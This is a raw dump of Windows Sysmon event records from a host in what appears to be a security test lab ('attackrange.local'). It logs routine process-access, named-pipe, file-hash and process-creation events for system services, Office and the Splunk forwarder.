14:58:03.389{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077737Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.389{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000077736Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.357{A7A01FEF-EBFB-607E-040E-00000000BB01}11445220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x800000000000000077735Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.357{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000077734Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.342{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077733Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.342{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077732Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.342{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077731Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.342{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x800000000000000077730Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.342{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077729Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.342{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077728Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.342{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\FTA_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 23542300x800000000000000077727Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.326{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=E90C9B6B188B21D6B7B4F5C24DB05B49,SHA256=BB2C33EDBC6CDAD38AC80A6D353583CE1C1DC58070C9A17A3FE5F3308FC56E37,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000077726Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.311{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBFB-607E-080E-00000000BB01}4924C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077725Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.311{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBFB-607E-090E-00000000BB01}4952C:\Windows\syswow64\MsiExec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000077724Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.311{A7A01FEF-EB7F-607E-9C0B-00000000BB01}14006700C:\Windows\system32\msiexec.exe{A7A01FEF-EBFB-607E-090E-00000000BB01}4952C:\Windows\syswow64\MsiExec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\ADVAPI32.dll+1845f|C:\Windows\system32\Msi.dll+ba4f5|C:\Windows\system32\Msi.dll+16c3b4|C:\Windows\system32\Msi.dll+16ca2c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000077723Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.318{A7A01FEF-EBFB-607E-090E-00000000BB01}4952C:\Windows\SysWOW64\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 13F43E36A050422DE6B07A2208924DB7 E Global\MSI0000C:\Windows\SysWOW64\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=0BDEAEA7BB4AE7822416CD37EA8EE00D,SHA256=5C188CE4E21FAB002B4D669F91FA19341AB4260F83D798FDAC53229D675DB6BA,IMPHASH=B4730776DFCE61DBCD10D002E3D530E1{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\System32\msiexec.exeC:\Windows\system32\msiexec.exe /V 10341000x800000000000000077722Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.311{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077721Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.295{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077720Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.295{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077719Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.295{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077718Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.295{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBFB-607E-080E-00000000BB01}4924C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000077717Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.295{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBFB-607E-080E-00000000BB01}4924C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000077716Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.264{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=8EFBFF3399FDBE49C536CB44B517DE9B,SHA256=A2EF1F60AE0C1EB30D32F4048C6FE31C76126110D21B3947945B926331E0DCEC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000077715Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.264{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBFB-607E-070E-00000000BB01}5472C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077714Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.248{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\integration\integrator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077713Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.232{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}5472C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000077712Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.232{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{00000000-0000-0000-0000-000000000000}5472C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 18141800x800000000000000077711Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.217{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000077710Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.201{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-EBFB-607E-040E-00000000BB01}1144C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077709Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.201{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBFB-607E-040E-00000000BB01}1144C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000077708Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.201{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-EBFB-607E-040E-00000000BB01}1144C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000077707Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.062{A7A01FEF-EBFB-607E-040E-00000000BB01}1144C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000077706Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.185{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBFB-607E-060E-00000000BB01}5424C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077705Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 